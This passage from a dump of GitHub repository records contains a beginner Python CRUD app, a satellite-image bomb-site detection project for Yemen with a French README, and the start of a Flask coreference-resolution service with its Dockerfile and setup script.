for client in const.clients:\n if client[key] ==data:\n client_exist = True\n break\n else:\n continue\n return client_exist"
},
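A minimal usage sketch for the `crud` class above, assuming the two seeded entries in `const.clients` from const.py:

```python
# Illustrative driver for crud.py; the seeded entries come from const.py.
import crud

store = crud.crud()
store.read_clients()                                  # prints the two seeded clients
print(store.search_client("jorge"))                   # True: 'jorge' is seeded
print(store.search_client("Upiita", key="company"))   # search on another field
```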
{
"alpha_fraction": 0.48184019327163696,
"alphanum_fraction": 0.48184019327163696,
"avg_line_length": 13.785714149475098,
"blob_id": "232a604b0554b1b98b68ae71b7e6b6f4827b6cee",
"content_id": "2966ba23a3a147d839747b9d11e1bd190a8cf369",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 413,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 28,
"path": "/const.py",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "menu = \"\"\"\nWelcome to my fist CRUD in python\n\nplease choose any option\n\n[C] create\n[R] read\n[U] update\n[D] delete\n[S] search for name\n\n[E] exit\n\"\"\"\n\nclients = [\n {\n 'name': 'jorge',\n 'company': 'Upiita',\n 'email': '[email protected]',\n 'position': \"student\"\n },\n {\n 'name': 'carlos',\n 'company': 'Upiita',\n 'email': '[email protected]',\n 'position': \"teacher\"\n },\n]"
},
{
"alpha_fraction": 0.4852631688117981,
"alphanum_fraction": 0.4852631688117981,
"avg_line_length": 22.774999618530273,
"blob_id": "9009dc0d949db210c653bf8b1154291fc56b78dd",
"content_id": "65d605e4d17eabf73933f46a65b512b20db6a4d4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 950,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 40,
"path": "/main.py",
"repo_name": "j-luis996/crud_python-dic",
"src_encoding": "UTF-8",
"text": "import os\nimport const\nimport crud\n\n\ncrud = crud.crud()\ndef main():\n command = None\n\n while command != 'E':\n os.system('clear')\n\n print(const.menu)\n\n command = input()\n command = command.upper()\n\n if command == 'C':\n crud.create_client()\n elif command == 'R':\n crud.read_clients()\n elif command == 'U':\n crud.update_client()\n elif command == 'D':\n crud.delete_client()\n elif command == 'S':\n name = input('What is the client name? ')\n if crud.search_client(name):\n print(\"The client is in the client's list\")\n else:\n print(f\"The client: {name} is not in our client's list\")\n else:\n if command != 'E':\n print('command invalid')\n if command != 'E':\n input('press any key for continue')\n\n\nif __name__ == \"__main__\":\n main()"
}
] | 4 |
mbettinger/yemen-bombings-tracking | https://github.com/mbettinger/yemen-bombings-tracking | 7a228bf925a2cf274bb7dff9b249ecc74fffe3f5 | a7028f9af24063ac4fe179d5ec2c65cff270edea | adfdd597ac0bd2f259944909da7a0e99077500d3 | refs/heads/master | 2023-01-10T16:34:12.948821 | 2020-11-10T10:09:45 | 2020-11-10T10:09:45 | 263,365,415 | 0 | 0 | null | 2020-05-12T14:46:36 | 2020-11-02T09:39:42 | 2020-11-10T10:09:46 | null | [
{
"alpha_fraction": 0.5574193596839905,
"alphanum_fraction": 0.6219354867935181,
"avg_line_length": 27.740739822387695,
"blob_id": "b53c29f45ac6e902445f3ae47308f69b49fa1443",
"content_id": "7037e175d5af104fb13f90afbe5f7bec2c09b4a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 775,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 27,
"path": "/contours.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import imutils\nimport cv2\nimport numpy as np\n\nimage = cv2.imread(\"data/processed/1_target.jpg\")\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nblurred = cv2.GaussianBlur(gray, (5, 5), 0)\nthresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n\ncnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,\n\tcv2.CHAIN_APPROX_SIMPLE)\ncnts = imutils.grab_contours(cnts)\n\nfor c in cnts:\n try:\n rect=cv2.minAreaRect(c)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n cv2.drawContours(image,[box],0,(0,0,255),2)\n M = cv2.moments(c)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n\n cv2.drawContours(image, [c], -1, (0, 255, 0), 2)\n except Exception as e:\n print(e)\ncv2.imwrite(\"image.png\",image)"
},
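The bare `try/except` in contours.py above mostly guards the moments division: a degenerate (line- or point-like) contour has `m00 == 0`. A small sketch of an explicit guard instead of catching the exception; the helper name is illustrative:

```python
# Explicit zero-area guard for the centroid computation in contours.py.
import cv2


def contour_centroid(contour):
    m = cv2.moments(contour)
    if m["m00"] == 0:
        # Degenerate contour with no area: no well-defined centroid.
        return None
    return int(m["m10"] / m["m00"]), int(m["m01"] / m["m00"])
```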
{
"alpha_fraction": 0.5593400597572327,
"alphanum_fraction": 0.5955295562744141,
"avg_line_length": 35.153846740722656,
"blob_id": "775b8e15960ad246d7abf62bea44c916388232c7",
"content_id": "12c04a96cd31b806473675143ea2ee6305e2a58d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1879,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 52,
"path": "/utils.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\ndef histogram_equalization(img_in):\n # segregate color streams\n b, g, r = cv2.split(img_in)\n h_b, bin_b = np.histogram(b.flatten(), 256, [0, 256])\n h_g, bin_g = np.histogram(g.flatten(), 256, [0, 256])\n h_r, bin_r = np.histogram(r.flatten(), 256, [0, 256])\n # calculate cdf\n cdf_b = np.cumsum(h_b)\n cdf_g = np.cumsum(h_g)\n cdf_r = np.cumsum(h_r)\n\n # mask all pixels with value=0 and replace it with mean of the pixel values\n cdf_m_b = np.ma.masked_equal(cdf_b, 0)\n cdf_m_b = (cdf_m_b - cdf_m_b.min()) * 255 / (cdf_m_b.max() - cdf_m_b.min())\n cdf_final_b = np.ma.filled(cdf_m_b, 0).astype('uint8')\n\n cdf_m_g = np.ma.masked_equal(cdf_g, 0)\n cdf_m_g = (cdf_m_g - cdf_m_g.min()) * 255 / (cdf_m_g.max() - cdf_m_g.min())\n cdf_final_g = np.ma.filled(cdf_m_g, 0).astype('uint8')\n cdf_m_r = np.ma.masked_equal(cdf_r, 0)\n cdf_m_r = (cdf_m_r - cdf_m_r.min()) * 255 / (cdf_m_r.max() - cdf_m_r.min())\n cdf_final_r = np.ma.filled(cdf_m_r, 0).astype('uint8')\n # merge the images in the three channels\n img_b = cdf_final_b[b]\n img_g = cdf_final_g[g]\n img_r = cdf_final_r[r]\n\n img_out = cv2.merge((img_b, img_g, img_r))\n # validation\n equ_b = cv2.equalizeHist(b)\n equ_g = cv2.equalizeHist(g)\n equ_r = cv2.equalizeHist(r)\n equ = cv2.merge((equ_b, equ_g, equ_r))\n # print(equ)\n # cv2.imwrite('output_name.png', equ)\n return img_out\n\ndef image_difference(img1, img3, t_up=196, t_down=128) :\n img_diff = np.ndarray(shape=img1.shape, dtype='float32')\n img_diff.fill(128)\n img_diff += (img1 - img3)\n img_diff -= img_diff.min()\n img_diff *= (255/img_diff.max())\n # plt.imshow(PIL.Image.fromarray((img_diff).astype(np.uint8)))\n # plt.imshow(PIL.Image.fromarray(img_diff))\n # plt.show()\n placement = (img_diff > t_down) * (img_diff < t_up)\n\n return img_diff, placement"
},
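A tiny worked example of `image_difference` above on synthetic float arrays: the signed difference is recentred around 128, rescaled to 0..255, and only pixels whose rescaled value falls strictly between `t_down` and `t_up` are flagged:

```python
# Worked example for utils.image_difference on a 4x4 synthetic pair.
import numpy as np
from utils import image_difference

a = np.zeros((4, 4), dtype="float32")
b = np.zeros((4, 4), dtype="float32")
a[0, 0] = 100.0   # strong positive difference -> rescales to 255, rejected
b[3, 3] = 100.0   # strong negative difference -> rescales to 0, rejected
a[1, 1] = 50.0    # moderate positive difference -> lands inside the band

diff, mask = image_difference(a, b)   # defaults: t_up=196, t_down=128
print(mask.astype(int))               # only the (1, 1) pixel is flagged
```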
{
"alpha_fraction": 0.6149019598960876,
"alphanum_fraction": 0.6274510025978088,
"avg_line_length": 30.875,
"blob_id": "3ba3a2265dd17c727128dfb773044efbcde8b1e3",
"content_id": "1f305bd6e2346c83dee5a1d034f3aa9dd0b1464b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1275,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 40,
"path": "/prepare.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import argparse\nimport h5py\nfrom tqdm import tqdm\nimport os\nimport cv2\n\n\ndef prepare_preprocessing(args):\n h5_file = h5py.File(args.unprocessed_hdf5, 'w') # args.hdf5_file\n\n label = h5_file.create_group('label')\n target = h5_file.create_group('target')\n info = h5_file.create_group('info')\n info.create_dataset(str(1), data=\"preprocess\")\n # TODO CREATE INFO\n\n all_images = os.listdir('{}/'.format(args.unprocessed_path))\n os.chdir('{}/'.format(args.unprocessed_path))\n\n for image_file in tqdm(sorted(all_images)):\n if not \".DS_Store\" in image_file:\n img = cv2.imread(image_file)\n i = image_file.split('_')[1].split('.')[0]\n if \"src\" in image_file:\n label.create_dataset(str(i), data=img)\n if \"target\" in image_file:\n target.create_dataset(str(i), data=img)\n\n h5_file.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--unprocessed-path', type=str, default=\"data/unprocessed\")\n parser.add_argument('--unprocessed-hdf5', type=str, default=\"unprocessed.h5\")\n parser.add_argument('--preprocess', action='store_true')\n args = parser.parse_args()\n\n if args.preprocess :\n prepare_preprocessing(args)\n"
},
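A quick read-back sketch for the file written by `prepare_preprocessing` above, to confirm that each key holds a label/target image pair:

```python
# Verification sketch for the HDF5 layout produced by prepare.py.
import h5py

with h5py.File("unprocessed.h5", "r") as f:
    print(len(f["label"]), "label/target pairs")
    for key in f["label"]:
        print(key, f["label"][key].shape, f["target"][key].shape)
```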
{
"alpha_fraction": 0.5612582564353943,
"alphanum_fraction": 0.5811258554458618,
"avg_line_length": 26.5,
"blob_id": "f44b6a661d1b6fc6b4e6bfc66884f12f9aae44f9",
"content_id": "6b5cd4765b1568ecad06700155015fb43423c751",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 22,
"path": "/datasets.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom torch.utils.data import Dataset\nimport h5py\nimport glob\nimport cv2\nfrom PIL import Image\n\nclass HDF5torch(Dataset):\n def __init__(self, h5_file):\n super(HDF5torch, self).__init__()\n self.h5_file = h5_file\n\n def __getitem__(self, idx):\n with h5py.File(self.h5_file, 'r') as f:\n #if f['info'][str(1)] == 'unprocessed':\n return f['label'][str(idx)][:, :], f['target'][str(idx)][:, :]\n\n def __len__(self):\n with h5py.File(self.h5_file, 'r') as f:\n return len(f['label'])\n\n# Could create a tensorflow dataset aswell"
},
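A usage sketch wrapping `HDF5torch` above in a PyTorch `DataLoader`. Note that `__getitem__` looks keys up by `str(idx)`, so this assumes the file was written with contiguous integer keys starting at 0; `batch_size=1` avoids collating images of different shapes:

```python
# DataLoader sketch for datasets.HDF5torch, under the assumptions above.
from torch.utils.data import DataLoader
from datasets import HDF5torch

dataset = HDF5torch("unprocessed.h5")
loader = DataLoader(dataset, batch_size=1, shuffle=False)
for label, target in loader:
    print(label.shape, target.shape)
    break
```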
{
"alpha_fraction": 0.6563400626182556,
"alphanum_fraction": 0.670028805732727,
"avg_line_length": 30.56818199157715,
"blob_id": "5ef116798968c2c8e696b37a1c7be5cc620f79d1",
"content_id": "fe80c9cf37bbdbce3d2059bd97b60e13dbb4d733",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 44,
"path": "/preprocessor.py",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "import os\nimport argparse\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport cv2\nfrom skimage import exposure\nfrom skimage.transform import match_histograms\nfrom skimage.filters import rank\nfrom skimage.morphology import disk\nfrom datasets import HDF5torch\nfrom utils import histogram_equalization, image_difference\nimport tqdm\n\ndef preprocess(dataset) :\n i = 0\n for data in dataset:\n src, target = data\n if len(src.shape) > 2:\n src = histogram_equalization(src)\n target = histogram_equalization(target)\n else:\n src = cv2.equalizeHist(src)\n target = cv2.equalizeHist(target)\n\n matched = match_histograms(src, target, multichannel=False)\n # threshold up\n t_up = 255\n # threshold down\n t_down = 205\n dif, dif_placement = image_difference(matched, target, t_up, t_down)\n\n cv2.imwrite(\"{}/{}_dif_{}_{}.jpg\".format(args.preprocessed_path, i, t_up,t_down), target * dif_placement)\n i = i+1\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--unprocessed-hdf5', type=str, default=\"unprocessed.h5\")\n parser.add_argument('--preprocessed-path', type=str, default=\"data/preprocessed\")\n args = parser.parse_args()\n\n dataset = HDF5torch(args.unprocessed_hdf5)\n preprocess(dataset)"
},
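A mini-demo of the histogram matching step used in `preprocess` above, on synthetic data; note that newer scikit-image versions expose `match_histograms` from `skimage.exposure` rather than `skimage.transform`:

```python
# Histogram matching reshapes src's intensity distribution towards target's.
import numpy as np
from skimage.exposure import match_histograms

rng = np.random.default_rng(0)
src = rng.normal(100, 10, (64, 64))
target = rng.normal(150, 30, (64, 64))

matched = match_histograms(src, target)
print(round(src.mean()), round(target.mean()), round(matched.mean()))
# matched's mean moves from ~100 towards ~150
```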
{
"alpha_fraction": 0.7508859634399414,
"alphanum_fraction": 0.7614368796348572,
"avg_line_length": 69.5397720336914,
"blob_id": "ac90458cca9666590c9f5e084741d2a287929545",
"content_id": "d02b0e1cb008ded8403f461d5addf27f0f2f8ec3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 12550,
"license_type": "no_license",
"max_line_length": 350,
"num_lines": 176,
"path": "/README.md",
"repo_name": "mbettinger/yemen-bombings-tracking",
"src_encoding": "UTF-8",
"text": "# yemen-bombings-tracking\nBombsite tracing and detection project in Yemen using satellite images led by [BETTINGER Matthieu](), [HAFID Salim]() and [SADER Bruno]() for Humanity & Inclusion in collaboration with the Foundation INSA.\n\n# Sommaire\n# Architecture d'augmentation et de detection des bombardements grâce à Sentinel\n## Sentinel\nSentinel est un groupe de satelittes gratuitement accessible de Agence spatiale européenne.\nLes satelittes les plus precis sont les Sentinel-2A/B pour la qualité d'image et le Sentinel 5p pour les parametres atmospheriques (O3, CH4, NO2 etc...)\n\n### Le module **fetcher** est utilisé pour obtenir les données du satellite Sentinel-2.\n\n*--api-file* : utilisé pour initialiser la connexion avec l'API sentinelsat avec un fichier json contenant \"user\" et \"pass\". Par défaut, utilise le document appelé SentinelAPIUser.json.<br>\n*--district-file* : json contenant une liste de tous les districts (dans notre cas tous les districts du Yémen) et leur polygone correspondant.<br>\n*--district-name* : nécessaire pour récupérer les informations d'un district particulier.<br>\n*--start-date* : format ddmmYYYY<br>\n*--end-date* : format ddmmYYYY<br>\n*--level* : utilisé pour indiquer le type de produit que nous recherchons. Par défaut, le niveau est 1C (type de produit S2MSI1C) mais le niveau peut être 2A (S2MSI2A)<br>\n\nLa doc sentinelsat peut etre trouvé sur https://sentinelsat.readthedocs.io/en/stable/.\n\n### Le module **processor** est utilisé afin de traiter les images obtenues grace au fetcher.\n\nla fonction ```process_products(unprocessed_path, processed_path, best_product)``` prend en entrée trois parametres:\n1. *unprocessed_path*: qui est le chemin vers les images non traitées\n2. *processed_path*: qui est le chemin vers le dossier ou non souhaitons sauvegarder l'image traité\n3. *best_product*: est le meilleur produit (ayant une couverture nuagueuse minimale)\n\nCette fonction sert a combiner les 3 bandes de couleurs (Rouge/Vert/Bleu) en une seule image .tiff (ce format est choisi car il ne compresse pas l'image). Cependant l'image etant trop grosse, il l'a coupe en 4 images de tailles identiques (```split_into_tiles``` du module utils) afin d'avoir des images plus facilement manipulables.\n\nCe module utilise les meme arguments que fetcher\n\n### Le module utils contient toutes les fonctiones annexes utiles aux modules\n\n## Augmentation d'image\n\nL'augmentation d'image est un processus visant à ameliorer la qualité d'une image source. 
Les images Sentinel etant de trop \"basse\" qualité ($10m^2$), l'augmentation aurait permit au model de detection de mieux fonctionner.\n\n### Le module **prepare**\nCe module est un peu particulier car il est utilisé en amont afin de preparer nos données sous un format specifique utilisable par nos modeles.<br>\nLes images sont donc traitées selon la litterature ([\"Image Super-Resolution Using Deep Convolutional Networks\"](https://arxiv.org/abs/1501.00092) pour le SRCNN par exemple) et stockées dans un fichier hdf5 (ce fichier permettant ensuite de plus facilement utiliser les images traitées et de les partager avec une vm ou un serveur).<br>\nLes images sont traitées de la maniere suivante: \n- une image dites hr (haute resolution)\n- une image lr (low resolution) qui est l'image hr reduite d'un facteur X (parametre *--scale*) grâce à une interpolation bicubique.\n\n*--images-dir* : est le chemin vers le dossier qui contient les images qu'on souhaite preparer (le chemin du parametre processed_path).<br>\n*--output-dir* : est le chemin vers le fihcier hdf5 que nous souhaitons créer (ex. \"data_out.h5\").<br>\n*--model* : est un parametre qui permet d'indiquer pour quel model nous traitons les données.<br>\n*--eval* : est un parametre qui permet d'indiquer si nous preparons l'image à etre testée.<br>\n*--scale* : est un parametre qui permet d'indiquer quel est la diminution de resolution souhaitée.<br>\n\n### Le module **datasets**\n\nLe module dataset permet de transformer le fichier hdf5 en un object pytorch ([Dataset](https://pytorch.org/docs/stable/data.html#torch.utils.data.Dataset)) interpretable par notre model (util pour l'apprentissage et l'évaluation)\n\n### Le module **model**\n\nLe module contient les differents modeles testés lors du developement<br>\nLes 3 modeles qui sont integrés sont:\n\n- SRCNN<br>\nModel implementé selon [\"Image Super-Resolution Using Deep Convolutional Networks\"](https://arxiv.org/abs/1501.00092) et grace au [dépôt git](https://github.com/yjn870/SRCNN-pytorch/)<br>\n <center><img src=\"SRCNN_figure.png\"></center>\n\n- FSRCNN<br>\nModel implementé selon [\"Accelerating the Super-Resolution Convolutional Neural Network\"](https://arxiv.org/abs/1608.00367) et grace au [dépôt git](https://github.com/yjn870/FSRCNN-pytorch/)<br>\n<center><img src=\"FSRCNN_figure.png\"></center>\n\n- SubPixel<br>\nModel implémenté selon [\"Guided Super-Resolution as Pixel-to-Pixel Transformation\"](https://arxiv.org/abs/1904.01501) et grace au [dépôt git](https://github.com/riccardodelutio/PixTransform).<br>\nCe model permet d'appliqué l'information d'une image lr à une image hr afin d'avoir une image de bonne qualité avec les informations supplémentaires.<br>\n<center><img src=\"subpix_figure.png\" width=\"500\"></center>\n\n### Les modules **train** et **test**\n\n- Le module train<br>\nLe module sert, comme son nom l'indique, à entrainer nos modeles.<br>\n*--train-file* : est le chemin vers le fichier hdf5 d'entrainement <br>\n*--val-file* : est le chemin vers le fichier hdf5 de validation <br>\n*--output-dir* : est le chemin vers le dossier ou nous souhaitons sauvegarder les poids du model<br>\n*--scale* : est le facteur d'augmentation<br>\n*--lr* : est le learning rate<br>\n*--batch-size* : est la taille de chaque batch<br>\n*--model* : permet d'indiquer le model qu'on souhaite entrainer<br>\n*--num-epochs* : est le nombre d'epoch sur lesquels nous souhaitons entrainer<br>\n\nL'entrainement du model est fait grace à des images Google Earth (hr) qui sont reduites afin 
d'avoir la meme image de basse qualité. Nous entrainons donc le model à recreer l'image de base en partant de l'image lr. Afin d'evaluer le model nous utilisons comme métrique le PSNR (Peak Signal to Noise Ratio) qui est défini par la formule suivante :<br>\nPSNR = *10*$\\times$$log_{10}$$\\frac{d^2}{EQM}$ avec EQM l'erreur quadratique moyenne, et $d^2$ la dynamique du signal (la valeur maximum possible pour un pixel).\n\n- Le module test<br>\n*--weights-file* : le chemin vers le fichier des poids (.pth) <br>\n*--image-dir* : le chemin vers le dossier des images<br>\n*--scale* : est le facteur d'augmentation<br>\n*--model* : permet de choisir le model qu'on teste<br>\n*--test-data* : permet de specifier si nous voulons utiliser des images qui sont dans le répertoire courant<br>\n\n### Le module **augment**\nCe module utilise le modele entrainé et augmente les images.<br>\nIl est utilisé dans le module principal ```main```\n\n## Detection des bombardements\nLa detection des bombardements est fait grace a un modele d'apprentissage machine qui apprend a determiner sur une image ce qui est ou n'est pas un bombardement. Cette partie n'a jamais pu etre testé du au manque de puissance de calcul.<br>\nAfin d'utiliser la detection, il est necessaire d'avoir des images labelisées (cf module model).\n\n### Les modules **prepare** et **datasets**\nComme pour la partie d'augmentation, ces deux modules sont utilisés afin de preparer nos données et de les stocker dans un object utilisable par pytorch.\n- prepare<br>\n*--images-dir* : est le chemin vers le repertoire ou nous avons nos images <br>\n*--label-dir* : est le chemin vers le repertoire ou nous avons nos la labelisation de nos images <br>\n*--output-dir* : est le chemin vers le fihcier hdf5 que nous souhaitons créer (ex. \"dataset.h5\"). <br> \n*--train* : est un parametre qui permet de specifier si nous preparons les images à l'entrainement <br>\n### Le module **model**\nImplementation du model Yolov3 utilisant ce [depot git](https://github.com/eriklindernoren/PyTorch-YOLOv3).<br>\nYolo est un algortihme qui identifie dans une image des objets specifiés. Dans notre cas, ce sont des bombardements. Afin de pouvoir les retrouver, nous avons besoin d'avoir des images labelisées (dont les parties de l'image contenant les bombardements sont encadrées).<br>\nPour labeliser les images, l'outil [labelImg](https://github.com/tzutalin/labelImg) est utilisé.\n<center><img src=\"https://github.com/ydixon/yolo_v3/blob/master/doc/x_wing.gif\" width=\"600\"></center>\n\n### Les modules **train** et **detect**\nLes deux modules sont importés du depot git [PyTorch Yolov3](https://github.com/eriklindernoren/PyTorch-YOLOv3).\n\n## Main\nAfin de lancer le workflow complet, le module principal ```main``` est utilisé. Ce module combine tout les modules précedemments décrits. <br>\nA noté que le module de detection n'est toujours pas integré car n'a pas pu etre entrainé.\n\n*--api-file* : utilisé pour initialiser la connexion avec l'API sentinelsat avec un fichier json contenant \"user\" et \"pass\". Par défaut, utilise le document appelé SentinelAPIUser.json.<br>\n*--district-file* : json contenant une liste de tous les districts (dans notre cas tous les districts du Yémen) et leur polygone correspondant.<br>\n*--district-name* : nécessaire pour récupérer les informations d'un district particulier.<br>\n*--start-date* : format ddmmYYYY<br>\n*--end-date* : format ddmmYYYY<br>\n*--level* : utilisé pour indiquer le type de produit que nous recherchons. 
Par défaut, le niveau est 1C (type de produit S2MSI1C) mais le niveau peut être 2A (S2MSI2A)<br>\n*--unprocessed-path* : qui est le chemin vers les images non traitées<br>\n*--processed-path* : qui est le chemin vers le dossier ou non souhaitons sauvegarder l'image traité<br>\n*--augmentation-hdf5* : est le chemin vers le fichier hdf5 d'augmentation. <br>\n*--detection-hdf5* : est le chemin vers le fichier hdf5 de detection. <br>\n*--model* : parametre qui permet d'indiquer le model d'augmentation a utiliser<br>\n*--augmentation-weights* : chemin vers le fichier des poids du model d'augmentation<br>\n\nL'architecture est la suivante :\n- Le module Streaming (qui contient toutes la logique de Sentinel) se connect à l'api grâce à l'argument --api-file et la fonction ```connect_to_api```.\n- Le fetcher recupère les produits qui repondent au criteres parametrés (fonction ```fetch_products```).\n- Pre-processing en utilisant le processor et sa fonction ```process_products```.\n- Ensuite le module d'augmentation perpare les images selon les criteres parametrés.\n- Le module d'augmentation les images preparées.\n- Finalement le module de detection devrait etre integré ici afin de travailler sur les images augmentées.\n\n## Requirements\n\n- PyTorch\n- Numpy\n- h5py\n- tqdm\n- etc\n \n# Detection et comparaison d'images\nLa procédure de prétraitement pour la comparaison entre les images en vue de détecter des bombardements est la suivante:\n- Obtention d'images source et cibles d'une même zone ;\n <center><img src=\"difference/5_src.jpg\" width=\"500\"></center>\n <center><img src=\"difference/5_target.jpg\" width=\"500\"></center>\n- Génération d'un masque des bâtiments à l'aide de l'API de [PicTerra](https://picterra.ch/) afin de ne pas détecter les changements sur d'autres zones (végétation, routes, etc.) ;\n<center><img src=\"difference/5_src_msk.png\" width=\"500\"></center>\n- Harmonisation de l'histogramme de couleurs de l'image source par rapport à celle cible ;\n<center><img src=\"difference/5_harm.png\" width=\"500\"></center>\n- (Optionnel) Application d'un filtre sur les deux images pour ne pas détecter des changements extrêmement ponctuels: conservation des contours avec un filtre de Kuwahara ;\n<center><img src=\"difference/5_filtr.png\" width=\"500\"></center>\n- Obtention de la différence entre les images et seuillage par un minimum de différence donné ;\n<center><img src=\"difference/5_grad.png\" width=\"500\"></center>\n<center><img src=\"difference/5_hsv.png\" width=\"500\"></center>\n- Application du masque des bâtiments sur l'image de différence.\n<center><img src=\"difference/5_masked.png\" width=\"500\"></center>\n\n# Axes d'ameliorations et de recherches\nHomogénéisation des images : Transformations par homographie pour aligner les points de vue (ie. opencv).\nSi on a accès à beaucoup d’images : Workflows utilisés par les caméras de vidéosurveillance.\n\nProblèmes non validés : Difficile de détecter les bâtiments quand la couleur du sol est proche de celle des bâtiments.\n\n# Credit\n\n"
}
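The README's improvement list mentions aligning viewpoints with homographies via OpenCV. A hedged sketch of what that could look like with ORB features; all names here are illustrative and not part of the repository:

```python
# Illustrative ORB + RANSAC homography alignment of two grayscale images.
import cv2
import numpy as np


def align_to_target(src_gray, target_gray):
    orb = cv2.ORB_create(1000)
    k1, d1 = orb.detectAndCompute(src_gray, None)
    k2, d2 = orb.detectAndCompute(target_gray, None)
    matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
    # keep the best matches by descriptor distance
    matches = sorted(matcher.match(d1, d2), key=lambda m: m.distance)[:200]
    pts1 = np.float32([k1[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)
    pts2 = np.float32([k2[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)
    H, _ = cv2.findHomography(pts1, pts2, cv2.RANSAC, 5.0)
    h, w = target_gray.shape
    # warp the source into the target's viewpoint
    return cv2.warpPerspective(src_gray, H, (w, h))
```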
] | 6 |
mouryabs/Coherence-Resolution-Resolver | https://github.com/mouryabs/Coherence-Resolution-Resolver | a728e1ae46fbc4fbc8b9e153bf054fcd40706293 | 8986e4e33ed9ce80299b90416599d7eea16d865c | b2e666986c239fde39cbc46cfa58d3859bd19d86 | refs/heads/master | 2023-01-22T17:15:16.328789 | 2020-12-07T04:04:29 | 2020-12-07T04:04:29 | 319,197,926 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7950310707092285,
"alphanum_fraction": 0.7950310707092285,
"avg_line_length": 31.200000762939453,
"blob_id": "d8186ea4f91441a8cf2eb04c2ac758f066673f52",
"content_id": "1af42e7dc40cabf8a6034b215fc160e97caaed7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 161,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 5,
"path": "/neuralcoref.sh",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "python -m spacy download en_core_web_sm\ngit clone https://github.com/huggingface/neuralcoref.git\ncd neuralcoref\npip install -r requirements.txt\npip install -e .\n"
},
{
"alpha_fraction": 0.5639412999153137,
"alphanum_fraction": 0.5639412999153137,
"avg_line_length": 17.346153259277344,
"blob_id": "233d2612f86aaf0a67c5861ee894abf577d44c07",
"content_id": "b6500db6760d3eadfe1ba46525f35cf14cfec534",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 26,
"path": "/main.py",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "from flask import Flask,request,jsonify\nimport coref\n\napp = Flask(__name__)\n\n\"\"\"\n expected input:\n {\n \"text\" : \"text that you need to send\" \n }\n expected ouput:\n {\n \"text\" : \"output text\"\n }\n\"\"\"\n\[email protected]('/getCoreRef', methods=['GET', 'POST'])\ndef perform_coreref():\n my_json = request.json\n text = my_json['text']\n text = coref.coref(text)\n my_dict = dict()\n my_dict['text'] = text\n return jsonify(my_dict)\n\napp.run()\n"
},
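A client-side sketch for the `/getCoreRef` endpoint above, matching the documented `{"text": ...}` request and response shape; Flask's default port 5000 is assumed:

```python
# Hypothetical client for the /getCoreRef endpoint.
import requests

resp = requests.post(
    "http://127.0.0.1:5000/getCoreRef",
    json={"text": "Barack Obama is the first president of US. He is from Hawaii."},
)
print(resp.json()["text"])  # pronouns replaced by their antecedents
```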
{
"alpha_fraction": 0.7305194735527039,
"alphanum_fraction": 0.7564935088157654,
"avg_line_length": 24.66666603088379,
"blob_id": "fdb891a718405dabe6e2acea7568c3bb274ab496",
"content_id": "f20e200dd733dfb7b724c0fec933dd71469e0d03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 308,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 12,
"path": "/Dockerfile",
"repo_name": "mouryabs/Coherence-Resolution-Resolver",
"src_encoding": "UTF-8",
"text": "FROM python:3\nADD neuralcoref.sh /neuralcoref.sh\nRUN ./neuralcoref.sh\nADD main.py main.py\nADD coref.py coref.py\nRUN pip install spacy==2.3.4\nRUN python -m spacy download en_core_web_md\nRUN pip install virtualenv\nRUN pip install flask\n#EXPOSE 5000\n#RUN python main.py\nENTRYPOINT [\"/bin/bash\", \"-c\",\"main.py\"]\n"
},
{
"alpha_fraction": 0.6558139324188232,
"alphanum_fraction": 0.6558139324188232,
"avg_line_length": 21.63157844543457,
